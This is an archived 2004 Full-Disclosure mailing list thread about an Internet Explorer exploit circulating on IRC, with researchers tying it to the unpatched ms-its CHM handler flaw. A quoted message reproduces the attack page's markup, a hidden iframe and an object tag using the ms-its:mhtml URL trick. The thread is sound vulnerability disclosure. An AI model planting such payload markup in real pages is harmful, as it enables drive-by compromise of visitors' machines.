lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: thor at pivx.com (Thor Larholm)
Subject: IE exploit going around on irc

The MS03-032 Object Data vulnerability dealt with improper handling of
HTA mime-types. 

What Niek forwarded is using the Ibiza CHM exploit that deals with
improper privileges gained through the ms-its/ms-itss URL protocol
handlers which is still unpatched.

Roozbeh Afrasiabi on this and others:

http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0

Drew Copley:

http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0

My post in February:

http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0


Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
Qwik-Fix
<http://www.qwik-fix.net> 

-----Original Message-----
From: David Jacoby [mailto:bugtraq@...p.hack.se] 
Sent: Monday, April 05, 2004 11:38 PM
To: full-disclosure@...ts.netsys.com
Subject: Re: [Full-Disclosure] IE exploit going around on irc


I just found this information:

http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor
.html

"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"

((pewp))


On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
> 
> this thing's been going around on irc the last few days:
> 
> www.divx.dc-hub.com (IE users don't click it!)
> check source:
> <iframe src='loi.htm' width=0 height=0></iframe>
> 
> loi.htm contains:
>     <object
>
data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
>     type="text/x-scriptlet"></object>
> 
> 
> LOI.CHM is attached
> 
> Regards,
> 
> Niek Baakman

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ